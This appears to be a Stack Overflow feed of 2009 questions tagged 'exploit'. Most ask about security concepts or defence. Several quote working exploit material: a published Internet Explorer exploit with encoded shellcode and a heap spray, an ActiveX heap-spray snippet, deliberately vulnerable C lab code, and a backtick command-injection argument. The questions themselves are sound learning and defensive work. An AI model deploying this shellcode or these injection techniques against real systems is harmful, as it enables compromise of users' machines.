active questions tagged exploit - Stack Overflowmost recent 30 from stackoverflow.com2009-12-21T23:51:32Zhttp://stackoverflow.com/feeds/tag/exploithttp://www.creativecommons.org/licenses/by-nc/2.5/rdfhttp://stackoverflow.com/questions/381171/help-me-understand-this-javascript-exploit29Help me understand this JavaScript exploitDaok2008-12-19T14:56:32Z2009-12-19T14:38:03Z
<p>I usually do not have difficulty to read JavaScript script but this one I can't figure out the logic. The code is from an Exploit that has been published 4 days ago. You can find it at <a href="http://www.milw0rm.com/exploits/7477" rel="nofollow">milw0rm</a>.</p>
<p>Here is the code:</p>
<pre><code><html>
<div id="replace">x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape("%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580");
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape("%u0a0a%u0a0a");
do {
spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
memory[i] = spray + shellcode;
xmlcode = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
tag = document.getElementById("replace");
tag.innerHTML = xmlcode;
</script>
</html>
</code></pre>
<p>Here is what I believe it does and I would like you to help me for the part that I misunderstand.</p>
<p>The variable <code>shellcode</code> contain the code to open the calc.exe. I do not get it how they have found that weird string... any idea?</p>
<p>The second thing is the variable <code>spray</code>. I do not understand this weird loop?</p>
<p>The third thing is the variable <code>memory</code> that is never used anywhere, why do they create it?</p>
<p>Last thing, What does the XML tag do in the page?</p>
<h2>Update</h2>
<p>Alright, for the moment I have good answers but mostly very
general. I would like more explanations of the value of the
code. An example is <code>unescape("%u0a0a%u0a0a");</code>. What does it mean?
Same thing for the loop, why did the developer write:
<code>length < 0xd0000</code>? I would like a deeper understanding, not
only the theory of this code.</p>
http://stackoverflow.com/questions/415/decode-email-address-from-gravatar-hash14Decode email address from Gravatar hash?Prakash2008-08-02T11:40:44Z2009-12-16T07:15:41Z
<p>I suppose, Gravatar generates the image from email address. If so, the reverse should be possible. How difficult would be to get the email associated with the image? Isnt it a potential spam threat?</p>
<p>What are your thoughts? (other than calling me paranoid ;) i did that already)</p>
http://stackoverflow.com/questions/1885979/php-get-variable-array-injection2PHP GET variable array injectionsamsung2009-12-11T05:30:07Z2009-12-11T06:56:10Z
<p>I've recently learned that it's possible to inject arrays into PHP GET variables to perform code execution?</p>
<p><code>.php?a[]=asd&a[]=asdasd&b[]=$a</code></p>
<p>That was the example I was given. I have no idea how it works and was wondering if this is even possible?</p>
http://stackoverflow.com/questions/1851293/what-are-some-advanced-and-modern-resources-on-exploit-writing14What are some advanced and modern resources on exploit writing?Simucal2009-12-05T06:05:33Z2009-12-06T04:11:44Z
<p>I've read and finished both <a href="http://rads.stackoverflow.com/amzn/click/0764574817" rel="nofollow">Reversing: Secrets of Reverse Engineering</a> and <a href="http://rads.stackoverflow.com/amzn/click/1593271441" rel="nofollow">Hacking: The Art of Exploitation</a>. They both were illuminating in their own way but I still feel like a lot of the techniques and information presented within them is outdated to some degree.</p>
<p>When the infamous Phrack Article, <a href="http://insecure.org/stf/smashstack.html" rel="nofollow">Smashing the Stack for Fun and Profit</a>, was written 1996 it was just before what I sort of consider the Computer Security "golden age".</p>
<p>Writing exploits in the years that followed was relatively easy. Some basic knowledge in C and Assembly was all that was required to perform buffer overflows and execute some arbitrary shell code on a victims machine.</p>
<p>To put it lightly, things have gotten <em>a lot</em> more complicated. Now security engineers have to contend with things like <a href="http://en.wikipedia.org/wiki/Address%5Fspace%5Flayout%5Frandomization" rel="nofollow">Address Space Layout Randomization (ASLR)</a>, <a href="http://en.wikipedia.org/wiki/Data%5FExecution%5FPrevention" rel="nofollow">Data Execution Prevention (DEP)</a>, <a href="http://en.wikipedia.org/wiki/Buffer%5Foverflow%5Fprotection" rel="nofollow">Stack Cookies</a>, Heap Cookies, and much more. The complexity of writing exploits went up at least an order of magnitude.</p>
<p>You can't event <em>run</em> most of the buffer overrun exploits in the tutorials you'll find today without compiling with a bunch of flags to turn off modern protections.</p>
<p>Now if you want to write an exploit you have to devise ways to turn off DEP, spray the heap with your shell-code hundreds of times and attempt to guess a random memory location near your shellcode. Not to mention the pervasiveness of managed languages in use today that are much more secure when it comes to these vulnerabilities.</p>
<p>I'm looking to extend my security knowledge beyond writing toy-exploits for a decade old system. I'm having trouble locating resources that help address the issues of writing exploits in the face of all the protections I outlined above.</p>
<p>What are the more advanced and prevalent papers, books or other resources devoted to contending with the challenges of writing exploits for modern systems?</p>
http://stackoverflow.com/questions/1807974/can-anyone-de-obfuscate-this-exploit1Can anyone de-obfuscate this exploit?mr-euro2009-11-27T10:33:08Z2009-11-27T11:47:56Z
<p>I came across the following exploit due to a warning from my AV software. It originated from an adserver delivering banner ads on one of my sites.</p>
<p>I have retrieved the content with Wget and copied to pastebin.</p>
<p><a href="http://pastebin.com/m6fa38fac" rel="nofollow">http://pastebin.com/m6fa38fac</a><br>
<strong>[Warning: Link may contain malware - Do not visit from vulnerable PC.]</strong></p>
<p>Please note that you have to scroll horizontally on pastebin as the code is all on one line.</p>
<p>Can anyone find out what the exploit actually does?</p>
<p>Thank you.</p>
http://stackoverflow.com/questions/1486841/printf-executing-exe-files-in-cygwin0printf executing .exe files in cygwinrusl2009-09-28T12:48:56Z2009-09-28T13:41:46Z
<p>so i had an assignment requiring me to 'break' a piece of vulnerable code. snippet:</p>
<pre><code>int main(int argc, char **argv)
{
/*...*/
while(i < argc-1)
{
switch(argv[i][0]-48)
{
case 1:
SmashHeap(argc,argv);
break;
/*...*/
case 8:
PrintfVulnerability(argv[++i]);
break;
default:
printf("%s is not recognized by this program",argv[i++]);
/*...*/
}
i++;
}
return (1);
}
void PrintfVulnerability(char *F)
{
printf(F);
}
</code></pre>
<p>in the end, i found it was so amazingly simple that im afraid i might get a poor grade... my solution:</p>
<ul>
<li>copypasta an executable into the home directory... i used freecell.exe</li>
<li>$ ./VulnerableCode 8 [backtick]freecell.exe[backtick]</li>
</ul>
<p><em>poof</em>!! im playing freecell. why did this work???</p>
http://stackoverflow.com/questions/667147/hacking-and-exploiting-how-do-you-deal-with-any-security-holes-you-find9Hacking and exploiting - How do you deal with any security holes you find?ChrisAD2009-03-20T17:28:17Z2009-09-24T13:49:36Z
<p>Today online security is a very important factor. Many businesses are completely based online, and there is tons of sensitive data available to check out only by using your web browser. </p>
<p>Seeking knowledge to secure my own applications Ive found that Im often testing others applications for exploits and security holes, maybe just for curiosity. As my knowledge on this field has expanded by testing on own applications, reading zero day exploits and by reading the book <a href="http://eu.wiley.com/WileyCDA/WileyTitle/productCd-0470170778.html" rel="nofollow">The Web Application Hacker s Handbook: Discovering and Exploiting Security Flaws</a>, Ive come to realize that a majority of online web applications are really exposed to a lot of security holes. </p>
<p>So what do you do? I'm in no interest of destroying or ruining anything, but my biggest "break through" on hacking I decided to alert the administrators of the page. My inquiry was promptly ignored, and the security hole has yet not been fixed. Why wouldn't they wanna fix it? How long will it be before someone with bad intentions break inn and choose to destroy everything?</p>
<p>I wonder why there's not more focus on this these days, and I would think there would be plenty of business opportunities in actually offering to test web applications for security flaws. Is it just me who have a too big curiosity or is there anyone else out there who experience the same? It is punishable by law in Norway to actually try break into a web page, even if you just check the source code and find the "hidden password" there, use it for login, your already breaking the law.</p>
http://stackoverflow.com/questions/1443411/are-there-security-issues-when-dynamically-loading-external-content-into-a-page-u0Are there security issues when dynamically loading external content into a page using jQuery?stagas2009-09-18T09:20:20Z2009-09-18T09:29:50Z
<p>I'm building a site and I would like to have external content dynamically loaded in a div using jQuery. The content could be a google search page, where one can navigate without actually leaving the site. Could someone exploit this and drive to a content of his own and run malicious code inside my site? Are there ways to prevent this? Is using an iframe the best bet?</p>
http://stackoverflow.com/questions/1386367/protect-ie6-from-exploits-when-testing1Protect IE6 from exploits when testing?acidzombie242009-09-06T18:41:24Z2009-09-06T18:44:15Z
<p>I wrote an app in C# which uses the webbrowser control. While using it, the site i happen to use it on had an ad that auto DLed and ran itself on my comp causing me to be very annoyed. According to safebrowsing.clients.google.com 2/5000 pages had this exploit, unlucky me.</p>
<p>I use IE6 for testing so what can i do to protect myself from those virus w/o upgrading to IE7+. Will setting the internet security to high solve the problem? (It appears to set every option to disable)</p>
http://stackoverflow.com/questions/869320/how-would-i-go-about-prevent-dll-injection6How would I go about prevent DLL injection.wowus2009-05-15T15:21:19Z2009-07-16T13:21:54Z
<p>So the other day, I saw this:</p>
<p><a href="http://www.edgeofnowhere.cc/viewtopic.php?p=2483118" rel="nofollow">http://www.edgeofnowhere.cc/viewtopic.php?p=2483118</a></p>
<p>and it goes over three different methods of DLL injection. How would I prevent these from the process? Or at a bare minimum, how do I prevent the first one?</p>
<p>I was thinking maybe a Ring 0 driver might be the only way to stop all three, but I'd like to see what the community thinks.</p>
http://stackoverflow.com/questions/1124657/heap-spray-internet-explorer-80Heap Spray Internet Explorer 8 [closed]XPACK2009-07-14T10:51:53Z2009-07-14T11:09:52Z
<p>Hi</p>
<p>I want to know, is there a way to spray IE8 heap?</p>
<p>I did my best but I was not able to spray IE 8 heap! I attached Olly to IE and I never see my data in Memory of IE.</p>
<p>How can I do that? I also used Heaplib, but again no luck!</p>
<p>Any advice? Is it impossible to spray IE 8 heap?</p>
<p>Thanks</p>
http://stackoverflow.com/questions/210820/can-you-find-the-web-security-issue-here2Can you find the web security issue here?NotDan2008-10-17T01:20:34Z2009-07-06T20:56:18Z
<p>I have a webpage that redirects to another webpage like this:</p>
<pre><code>http://www.myOtherServer.com/Sponsor.php?RedirectPage=http://mylink.com/whereIwasgoingtogo.html
</code></pre>
<p>Then the Sponsor.php page displays an ad with a link saying "Continue to your page" that links to the passed in RedirectPage. Are there security/spoofing issues that could come from this? What is the best way to handle this? (note that the user is not logged in to either site)</p>
http://stackoverflow.com/questions/289529/what-is-this-base64-look-alike-2What is this Base64 Look-alike? N-J2008-11-14T08:51:46Z2009-06-23T21:44:53Z
<p>I am new to decoding techniques and have just learnt about base64, sha-1, md5 and a few others yesterday. </p>
<p>I have been trying to figure out what "orkut" worms actually contain. </p>
<p>I was attacked by many orkut spammers and hackers in the past few days, and there is a similarity in the URLs that they send to us. </p>
<p>I don't know what information it contains but I need to figure it out. </p>
<p>The problem lies in the following texts:</p>
<pre>
Foo+bZGMiDsstRKVgpjhlfxMVpM=
lmKpr4+L6caaXii9iokloJ1A4xQ=
</pre>
<p>The encoding above appears to be base64 but it is not, because when-ever I try to decode it using online base64 decoders I get raw output and it doesn't decode accurately. </p>
<p>Maybe some other code has been mixed with base64. </p>
<p>Can anyone please help me decode it?, I'll be very grateful, thanks in advance.</p>
<p>N-J.</p>
http://stackoverflow.com/questions/696307/would-a-c-net-web-browser-be-susceptible-to-exploits4Would a C#/.Net web browser be susceptible to exploits?chris2009-03-30T07:36:14Z2009-03-30T09:51:38Z
<p>Is it correct to say that the .Net platform is more secure because the CLR guards against buffer overflow attacks?</p>
<p>Assuming there was a web browser running in a managed OS (like <a href="http://gocosmos.org/index.en.aspx" rel="nofollow">Cosmos</a>, <a href="http://www.sharpos.org/doku.php" rel="nofollow">SharpOS</a> or <a href="http://research.microsoft.com/en-us/projects/singularity/" rel="nofollow">Singularity</a>), would it be technically possible for an attacker to inject IL code into the app?</p>
<p>Would I have to worry about attacks that aren't possible in unmanaged apps?</p>
http://stackoverflow.com/questions/687059/risk-of-exploits-backwards-into-outbound-tcp-connections1Risk of exploits "backwards" into outbound tcp connections.ilDocteur2009-03-26T18:43:44Z2009-03-26T20:03:04Z
<p>I am building a server application that will maintain connections to other applications by initiating TCP connections out through a firewall that is only open for outbound traffic to the relevant IP's ports that the application will connect to.</p>
<p>What is the risk of someone having taken over the machine(s) we connect to being able to exploit our application backwards through the outbound connection that we have established.</p>
<p>The protocol used on the connection is not difficult to figure out but it's based on a periodic heartbeat (interval 30 seconds). If two successive heartbeats are missed, the initiater (us) will terminate the connection an reconnect.</p>
<p>The sourcecode or binaries for our application will not be available to the orginasation we connect to.</p>
http://stackoverflow.com/questions/651590/i-dont-understand-this-code3I don't understand this Codem3taspl0it2009-03-16T18:22:09Z2009-03-16T20:02:01Z
<p>I do not understand this code snippet :</p>
<pre><code>function ms(){
var plc=unescape('".
unescape( '\x43\x43\x43\x43\n.............\xEF'. $URL).CollectGarbage();
if (mf)return(0);
mf=1;
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++) m[i]=ss+plc;
hav();
return(1);
}
</code></pre>
<p>In the above function I can't seem to figure out the variable types, or figure out what it's doing with the <code>hsta</code> variable, and what it's assigning to it:</p>
<pre><code>var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
for(i=0;i<hb;i++)m[i]=ss+plc;
</code></pre>
<p>I also can't figure out this function :</p>
<pre><code>function fb(){
try {
var obj=null;
obj=cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}');
if(obj){
ms();
var buf = addr(0x0c0c0c0c);
while (buf.length < 400) buf += buf;
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
}
} catch(e){}
return 0;
}
</code></pre>
<p>What does the following code mean? </p>
<blockquote>
<p><code>cobj('{5C6698D9-7BE4-4122-8EC5-291D84DBD4A0}')</code></p>
</blockquote>
<p>What kind of variable is this? </p>
<pre><code>var buf = addr(0x0c0c0c0c);
buf = buf.substring(0,400);
obj.ExtractIptc = buf;
obj.ExtractExif = buf;
</code></pre>
<p>Most importantly, what is that code snippet trying to do?</p>
<p>Here are some more functions:</p>
<pre><code>function hex(num,width){
var digits='0123456789ABCDEF';
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex='0'+hex;
return hex;
}
function addr(addr){
return unescape('%u'+hex(addr&0xFFFF,4)+'%u'+hex((addr>>16)&0xFFFF,4));
}
</code></pre>
<p>Any guidance would be appreciated.</p>
http://stackoverflow.com/questions/229889/sanitizing-mysql-user-parameters2Sanitizing MySQL user parameters.Tom2008-10-23T14:17:00Z2009-03-06T08:39:43Z
<p>What are the dangerous characters that should be replaced in user input when the users' input will be inserted in a MySQL query? I know about quotes, double quotes, \r and \n. Are there others?<br><sub>(I don't have the option of using a smart connector that accepts parameters so I have to build the query myself and this will be implemented in multiple programming languages, including some obscure ones so solutions such as <code>mysql_real_escape_string</code> in PHP are not valid)</sub></p>
http://stackoverflow.com/questions/460519/how-are-buffer-overflows-used-to-exploit-computers10How are buffer overflows used to exploit computers?Simucal2009-01-20T08:59:55Z2009-03-05T20:45:39Z
<p>How are <a href="http://en.wikipedia.org/wiki/Buffer_overflow" rel="nofollow">buffer overflows</a> used to exploit computers? </p>
<p>How is one able to execute arbitrary code simply by causing <a href="http://en.wikipedia.org/wiki/Stack_buffer_overflow" rel="nofollow">stack</a> or <a href="http://en.wikipedia.org/wiki/Heap_overflow" rel="nofollow">heap</a> overflows?</p>
<p>I understand that portions of the programs memory are overwritten that aren't supposed to be, but I don't see how this leads to one executing their own code. Also, must the 3rd party's malicious code be written in the target processors assembly language? </p>
http://stackoverflow.com/questions/226637/possible-javascript-exploits-from-exposed-link0possible javascript exploits from exposed link?osp702008-10-22T16:45:05Z2009-03-01T04:25:18Z
<p>On a page from a website (one of ours) I can enter in the url the following code:</p>
<pre><code>javascript:createNewWindow('Something', 100, 100, 'Text')
</code></pre>
<p>Is there a way someone can exploit this?</p>
<pre><code>function createNewWindow(url, widthIn, heightIn, title)
{
var strOptions='toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=1,width=' + widthIn + ',height=' + heightIn;
var newWin = open( url,title,strOptions );
newWin.focus();
}
</code></pre>
http://stackoverflow.com/questions/481902/how-long-should-it-take-an-average-coder-to-understand-a-buffer-overflow0How long should it take an average coder to understand a buffer overflow? [closed]ramblinpeck2009-01-27T00:15:05Z2009-01-27T00:39:30Z
<p>How long should it take an average coder (has used C/C++ but isn't an expert) to understand what a buffer overflow is, why its a bad thing, and how someone might use it to take control of the application?</p>
http://stackoverflow.com/questions/409807/to-what-does-zero-day-refer5To what does "zero day" refer?Argalatyr2009-01-03T20:48:15Z2009-01-03T22:01:26Z
<p>Does "zero-day" or "0-day" (in context of software vulnerabilities and exploits) refer to the software release, or a particular type of exploit?</p>
<p>[I did not find an answer to this on SO. Though it is answered elsewhere on the Internet, my understanding of SO is that it's <a href="http://stackoverflow.com/faq">okay to ask/answer basic questions</a>]</p>
http://stackoverflow.com/questions/341966/how-do-widgets-like-http-sharethis-com-make-what-seem-to-be-xss-calls1how do widgets like "http://sharethis.com/" make what seem to be XSS callsAgile Noob2008-12-04T20:35:23Z2008-12-04T21:31:14Z
<p>How is it that tools like this one can make an ajax style call back to a central site? basically they give you a " tag to put on your site where ever it is. So in this widget you have the ability to ask for an email to be sent to you for the page you're currently on. I assume this makes an ajax style call back to share this who sends out the email. But how can they do this with out a proxy on your server and without the browser blocking it as an XSS exploit?</p>
<p>Any answers on this would be greatly appreciated thank you for your help. I assume working with the Flickr API would present the same challenges?</p>
<p>Link from the title : <a href="http://sharethis.com/" rel="nofollow">http://sharethis.com/</a></p>
http://stackoverflow.com/questions/286090/stack-overflow-exploit-in-c3Stack Overflow Exploit in CFernando Gonzalez2008-11-13T02:31:25Z2008-11-15T13:22:42Z
<p>Hey there guys, the question is actually about stack overflows in C.
I have an assigment that I can not get done for the life of me, i've looked at everything in the gdb and I just cant figure it.</p>
<p>The question is the following:</p>
<pre><code>int i,n;
void confused()
{
printf("who called me");
exit(0);
}
void shell_call(char *c)
{
printf(" ***Now calling \"%s\" shell command *** \n",c);
system(c);
exit(0);
}
void victim_func()
{
int a[4];
printf("[8]:%x\n", &a[8]);
printf("Enter n: "); scanf("%d",&n);
printf("Enter %d HEX Values \n",n);
for(i=0;i<n;i++) scanf("%x",&a[i]);
printf("Done reading junk numbers\n");
}
int main()
{
printf("ls=736c --- ps = 7370 --- cal = 6c6163\n");
printf("location of confused %x \n", confused);
printf("location of shell_call %x \n", shell_call);
victim_func();
printf("Done, thank you\n");
}
</code></pre>
<p>Ok, so I managed to get the first question correctly, which is to arbitrarily call one of the two functions not explicitly called in the main path. By the way, this has to be done while running the program without any modifications.
I did this by running the program, setting N to 7, which gets me to the Function Pointer of the victim_func frame, I write a[7] with the memory address of confused or shell_call, and it works. (I have a 64 bit machine, thats why I have to get it to 7, since the EBI pointer is 2 ints wide, instead of 1)
My question is the following, how could I control which argument gets passed to the shell_code funcion? ie. how do i write a string to char* c.
The whole point is executing unix commands like "ps" etc, by running only the program.</p>
<p>I figured writing the EBI pointer with the hex representation of "ps" and setting the arg list of shell_call to that, but that didn't work. I also tried inputing argsv arguments and setting the arg list of shell_call to the arg_list of main, but didnt work either. </p>
<p>I think the second version should work, but i believe im not setting the arg list of the new stack frame correctly ( I did it by writing a[8] to 0, since its the first part of the functin pointer, and writing a[9]=736c and a[10]=0000, but its probably not right since those are the parameters of victim_func. So how do i access the parameters of shell_call? </p>
http://stackoverflow.com/questions/245600/using-a-single-system-call-to-execute-multiple-commands-in-c1Using a Single system() Call to Execute Multiple Commands in CChance2008-10-29T02:21:41Z2008-10-29T03:28:46Z
<p>In an information security lab I'm working on, I've been tasked with executing multiple commands with a single call to "system()" (written in C, running on Fedora). What is the syntax that will allow me to execute more than command through system()? (The idea being you could execute arbitrary commands through a program running on a remote computer, if the program interacts with the OS through the system() call.)</p>
<p>I.e.:</p>
<p>char command[] = "????? \r\n";
system(command);</p>
<p>Any tips would be great! Thanks.</p>
http://stackoverflow.com/questions/138432/whats-the-best-way-to-detect-web-applications-attacks1What's the best way to detect web applications attacks ?paulgreg2008-09-26T09:18:01Z2008-09-26T13:11:02Z
<p>What is the best way to survey and detect bad users behavior or attacks like deny of services or exploits on my web app ?</p>
<p>I know server's statistics (like <a href="http://awstats.sourceforge.net/" rel="nofollow">Awstats</a>) are very useful for that kind of purpose, specially to see 3XX, 4XX and 5XX errors (<a href="http://www.nltechno.com/awstats/awstats.pl?config=destailleur.fr&framename=mainright#errors" rel="nofollow">here's an Awstats example page</a>) which are often bots or bad intentioned users that try well-known bad or malformed URLs.</p>
<p>Is there others (and betters) ways to analyze and detect that kind of attack tentative ?</p>
<p>Note : I'm speaking about URL based attacks, not attacks on server's component (like database or TCP/IP).</p>
http://stackoverflow.com/questions/20510/executing-javascript-from-flex-is-this-javascript-function-dangerous1Executing JavaScript from Flex: Is this javascript function dangerous?mmattax2008-08-21T16:55:09Z2008-09-15T14:52:25Z
<p>I have a flex application that needs the ability to generate and execute JavaScript. When I say this, I mean I need to execute raw JavaScript that I create in my Flex application (not just an existing JavaScript method)</p>
<p>I am currently doing this by exposing the following JavaScript method:</p>
<pre><code>function doScript(js){ eval(js);}
</code></pre>
<p>I can then do something like this in Flex (note: I am doing something more substantial then an alert box in the real Flex app):</p>
<pre><code>ExternalInterface.call("doScript","alert('foo'));
</code></pre>
<p>My question is does this impose any security risk, I am assuming it's not since the Flex and JasvaScript all run client side...</p>
<p>Is there a better way to do this?</p>